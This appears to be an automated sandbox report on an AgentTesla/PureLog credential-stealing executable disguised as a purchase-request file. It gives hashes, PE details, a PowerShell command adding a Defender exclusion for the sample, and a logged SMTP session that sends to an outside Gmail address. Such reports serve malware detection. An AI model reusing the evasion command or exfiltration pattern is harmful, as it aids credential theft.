                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u51qhtv0.4gl.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1083392
                                      Entropy (8bit):7.9099962848519905
                                      Encrypted:false
                                      SSDEEP:24576:kTt1c89pBkpIjnQ0Pxthfv69Ay53xc6xoK4Lc/bLwbA6F36K:kKowpIpCOy53+LFM69
                                      MD5:0362B41458CD2B19F542E3F3F040C547
                                      SHA1:210E4B23A4CEBA122FB66F6C0ED92A534C852B57
                                      SHA-256:F3DD8124DC20B5DBE2AFDE3EAA092C05E1EB0FAE8FE16AAACFA9E0D5213F4117
                                      SHA-512:A3F0085B8D5EC44DFD34F9D9372D422A719174D50B6BC579DA57AD034336D67F917035CAD1E4A0F9111837E54FAB637546F07D0070E4131599CC507BB70F6BA2
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{0.f..............0..f... ........... ........@.. ....................................@.................................T...O.......0............................i..T............................................ ............... ..H............text....e... ...f.................. ..`.rsrc...0............h..............@..@.reloc..............................@..B........................H.......H`...V......+... ...p..............................................}.....(.......(.......}.....{.....o7...o.......(.....*....0..e............o=...o.....+8..(.......{....o.....o....&.o......,..{......o.......X....(....-...........o......*...........EU.......0............{....o....(...+(...+.+..*..0..+.........,..{.......+....,...{....o........("....*..0..o.........s#...}.....s$...}.....s$...}.....s%...}.....s%...}.....(&.....{.....o'.....{......;s(...o).....{....r...po

                                      C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier

                                      Download File
                                      Process:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.9099962848519905
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      File size:1'083'392 bytes
                                      MD5:0362b41458cd2b19f542e3f3f040c547
                                      SHA1:210e4b23a4ceba122fb66f6c0ed92a534c852b57
                                      SHA256:f3dd8124dc20b5dbe2afde3eaa092c05e1eb0fae8fe16aaacfa9e0d5213f4117
                                      SHA512:a3f0085b8d5ec44dfd34f9d9372d422a719174d50b6bc579da57ad034336d67f917035cad1e4a0f9111837e54fab637546f07d0070e4131599cc507bb70f6ba2
                                      SSDEEP:24576:kTt1c89pBkpIjnQ0Pxthfv69Ay53xc6xoK4Lc/bLwbA6F36K:kKowpIpCOy53+LFM69
                                      TLSH:21351240E2986AC5D0AA43F7DC70F941137B7B57157CC62879BB708F84B27C261A2E6B
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{0.f..............0..f... ........... ........@.. ....................................@................................

                                      File Icon

                                      Icon Hash:46992606071d1a94

                                      Static PE Info

                                      General

                                      Entrypoint:0x5085a6
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66AB307B [Thu Aug 1 06:51:39 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1085540x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x10a0000x1c30.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x10c0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1069900x54.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x1065ac0x106600469eb944f9880a0a80102c8cfb43cb35False0.9282117228442115data7.918254359877085IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x10a0000x1c300x1e00bff48e38bf674e59590a677aee410a6fFalse0.283984375data4.495542070491739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x10c0000xc0x200c9f79b5cbd7e56e1ef161c61dbb70947False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x10a1600x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.3953900709219858
                                      RT_ICON0x10a5c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.21693245778611633
                                      RT_GROUP_ICON0x10b6700x22data0.9411764705882353
                                      RT_VERSION0x10b6940x3b0data0.4173728813559322
                                      RT_MANIFEST0x10ba440x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 27, 2024 10:44:36.929817915 CEST50358587192.168.2.477.245.148.65
                                      Sep 27, 2024 10:44:36.934813976 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:36.934961081 CEST50358587192.168.2.477.245.148.65
                                      Sep 27, 2024 10:44:37.564563990 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:37.573321104 CEST50358587192.168.2.477.245.148.65
                                      Sep 27, 2024 10:44:37.578244925 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:37.806689024 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:37.861216068 CEST50358587192.168.2.477.245.148.65
                                      Sep 27, 2024 10:44:38.558726072 CEST50358587192.168.2.477.245.148.65
                                      Sep 27, 2024 10:44:38.563733101 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:38.796312094 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:38.796797991 CEST50358587192.168.2.477.245.148.65
                                      Sep 27, 2024 10:44:38.801667929 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:39.026072979 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:39.026376963 CEST50358587192.168.2.477.245.148.65
                                      Sep 27, 2024 10:44:39.031332016 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:42.264386892 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:42.264745951 CEST50358587192.168.2.477.245.148.65
                                      Sep 27, 2024 10:44:42.269769907 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:42.496138096 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:42.496898890 CEST50358587192.168.2.477.245.148.65
                                      Sep 27, 2024 10:44:42.501799107 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:42.729871035 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:42.785073042 CEST50358587192.168.2.477.245.148.65
                                      Sep 27, 2024 10:44:42.801044941 CEST50358587192.168.2.477.245.148.65
                                      Sep 27, 2024 10:44:42.806248903 CEST5875035877.245.148.65192.168.2.4
                                      Sep 27, 2024 10:44:42.807615042 CEST50358587192.168.2.477.245.148.65

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 27, 2024 10:43:22.321254969 CEST53529051.1.1.1192.168.2.4
                                      Sep 27, 2024 10:43:36.915010929 CEST5365436162.159.36.2192.168.2.4
                                      Sep 27, 2024 10:43:37.414424896 CEST5434853192.168.2.41.1.1.1
                                      Sep 27, 2024 10:43:37.422732115 CEST53543481.1.1.1192.168.2.4
                                      Sep 27, 2024 10:43:38.765053988 CEST6450053192.168.2.41.1.1.1
                                      Sep 27, 2024 10:43:38.772284031 CEST53645001.1.1.1192.168.2.4
                                      Sep 27, 2024 10:44:36.796443939 CEST6201253192.168.2.41.1.1.1
                                      Sep 27, 2024 10:44:36.911628008 CEST53620121.1.1.1192.168.2.4
                                      Sep 27, 2024 10:44:38.048201084 CEST5494853192.168.2.41.1.1.1
                                      Sep 27, 2024 10:44:38.490972996 CEST53549481.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Sep 27, 2024 10:43:37.414424896 CEST192.168.2.41.1.1.10x93ccStandard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                      Sep 27, 2024 10:43:38.765053988 CEST192.168.2.41.1.1.10xd55dStandard query (0)26.165.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                      Sep 27, 2024 10:44:36.796443939 CEST192.168.2.41.1.1.10xa214Standard query (0)mail.yildiztepeenerji.com.trA (IP address)IN (0x0001)false
                                      Sep 27, 2024 10:44:38.048201084 CEST192.168.2.41.1.1.10x9dc8Standard query (0)_kerberos._tcp.dc._msdcs.yildiztepeenerji.com.tr33IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Sep 27, 2024 10:43:37.422732115 CEST1.1.1.1192.168.2.40x93ccName error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                      Sep 27, 2024 10:43:38.772284031 CEST1.1.1.1192.168.2.40xd55dName error (3)26.165.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                      Sep 27, 2024 10:44:36.911628008 CEST1.1.1.1192.168.2.40xa214No error (0)mail.yildiztepeenerji.com.tr77.245.148.65A (IP address)IN (0x0001)false
                                      Sep 27, 2024 10:44:38.490972996 CEST1.1.1.1192.168.2.40x9dc8Name error (3)_kerberos._tcp.dc._msdcs.yildiztepeenerji.com.trnonenone33IN (0x0001)false

                                      SMTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Sep 27, 2024 10:44:37.564563990 CEST5875035877.245.148.65192.168.2.4220 mail05.trdns.com ESMTP IceWarp 11.3.1.5 x64; Fri, 27 Sep 2024 11:44:36 +0300
                                      Sep 27, 2024 10:44:37.573321104 CEST50358587192.168.2.477.245.148.65EHLO 506407
                                      Sep 27, 2024 10:44:37.806689024 CEST5875035877.245.148.65192.168.2.4250-mail05.trdns.com Hello 506407 [8.46.123.33], pleased to meet you.
                                      250-ENHANCEDSTATUSCODES
                                      250-SIZE
                                      250-EXPN
                                      250-ETRN
                                      250-ATRN
                                      250-DSN
                                      250-CHECKPOINT
                                      250-8BITMIME
                                      250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5 GSSAPI
                                      250-STARTTLS
                                      250-VRFY
                                      250 HELP
                                      Sep 27, 2024 10:44:38.558726072 CEST50358587192.168.2.477.245.148.65AUTH gssapi TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
                                      Sep 27, 2024 10:44:38.796312094 CEST5875035877.245.148.65192.168.2.4535 5.7.8 Authentication credentials invalid
                                      Sep 27, 2024 10:44:38.796797991 CEST50358587192.168.2.477.245.148.65AUTH login bXVoYXNlYmVAeWlsZGl6dGVwZWVuZXJqaS5jb20udHI=
                                      Sep 27, 2024 10:44:39.026072979 CEST5875035877.245.148.65192.168.2.4334 UGFzc3dvcmQ6
                                      Sep 27, 2024 10:44:42.264386892 CEST5875035877.245.148.65192.168.2.4535 5.7.8 Authentication credentials invalid
                                      Sep 27, 2024 10:44:42.264745951 CEST50358587192.168.2.477.245.148.65MAIL FROM:<muhasebe@yildiztepeenerji.com.tr>
                                      Sep 27, 2024 10:44:42.496138096 CEST5875035877.245.148.65192.168.2.4250 2.1.0 <muhasebe@yildiztepeenerji.com.tr>... Sender ok
                                      Sep 27, 2024 10:44:42.496898890 CEST50358587192.168.2.477.245.148.65RCPT TO:<obikachikezienelson19@gmail.com>
                                      Sep 27, 2024 10:44:42.729871035 CEST5875035877.245.148.65192.168.2.4550 5.7.1 <muhasebe@yildiztepeenerji.com.tr> Access to <obikachikezienelson19@gmail.com> not allowed

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:04:43:02
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                                      Imagebase:0x930000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1760927897.00000000053C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:04:43:03
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                                      Imagebase:0x860000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:04:43:03
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:04:43:03
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                                      Imagebase:0x220000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:04:43:03
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                                      Imagebase:0x770000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:5
                                      Start time:04:43:13
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x8f0000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1867946503.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 71%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:04:43:14
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x470000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1935883302.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:04:43:20
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:04:43:21
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x590000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:04:43:22
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x360000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:04:43:22
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0xe80000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.4184465405.000000000322B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:7.2%
